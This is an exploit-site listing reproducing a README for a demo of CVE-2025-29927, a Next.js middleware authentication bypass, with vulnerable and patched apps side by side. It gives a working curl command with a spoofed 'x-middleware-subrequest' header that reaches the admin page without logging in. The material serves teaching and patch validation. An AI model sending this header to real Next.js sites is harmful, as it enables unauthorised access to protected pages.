Exploit for CVE-2025-29927

Name: Exploit for CVE-2025-29927
Rating: 5 (100 reviews)
2025-03-29 | CVSS 9.1
## https://sploitus.com/exploit?id=B65EA98F-F341-5566-8926-9A276582F179
# Next.js Vulnerability Demo (CVE-2025-29927)

This repository contains a demonstration of the Next.js vulnerability CVE-2025-29927, which affects Next.js version 15.2.2 and earlier. The vulnerability allows attackers to bypass middleware authentication checks by setting an `x-middleware-subrequest` header.

## Repository Structure

This is an NX monorepo containing two Next.js applications:

1. **vulnerable-app**: Uses Next.js 15.2.2 with the vulnerability
2. **fixed-app**: Uses Next.js 15.2.3 with the fix implemented

## Vulnerability Explanation

In Next.js versions prior to 15.2.3, there's a security vulnerability in the middleware implementation. The middleware doesn't properly validate the origin of the `x-middleware-subrequest` header, allowing attackers to spoof this header and bypass middleware-based authentication checks.

## How to Run the Demo

### Prerequisites

- Node.js 18 or later
- npm or yarn
- Docker (optional, for containerized deployment)

### Running the Vulnerable App

```bash
# Navigate to the repository
cd nextjs-vulnerability

# Install dependencies for the vulnerable app
cd apps/vulnerable-app
npm install

# Start the vulnerable app
npm run dev
```

The vulnerable app will be available at http://localhost:3000.

### Running the Fixed App

```bash
# Navigate to the repository
cd nextjs-vulnerability

# Install dependencies for the fixed app
cd apps/fixed-app
npm install

# Start the fixed app
npm run dev
```

The fixed app will be available at http://localhost:3001.

### Using Docker

You can also run the apps using Docker:

```bash
# For the vulnerable app
cd apps/vulnerable-app
docker build -t nextjs-vulnerable .
docker run -p 3000:3000 nextjs-vulnerable

# For the fixed app
cd apps/fixed-app
docker build -t nextjs-fixed .
docker run -p 3001:3000 nextjs-fixed
```

## Demonstrating the Vulnerability

1. Open the vulnerable app (http://localhost:3000)
2. Click on "Admin" in the navigation bar
3. You'll be redirected to the login page since you're not authenticated
4. Now try accessing the admin page directly with the vulnerability:

```bash
# Using curl
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

# Or use a browser extension like ModHeader to add the header
# and then visit http://localhost:3000/admin
```

With the vulnerable version (15.2.2), you'll be able to access the admin page without authentication by adding the `x-middleware-subrequest` header.

With the fixed version (15.2.3), the middleware correctly validates the origin of this header, and you'll still be redirected to the login page.

## Login Credentials

For demo purposes, you can log in with:
- Username: `admin`
- Password: `password123`

## Security Recommendation

If you're using Next.js in production, make sure to update to version 15.2.3 or later to protect against this vulnerability.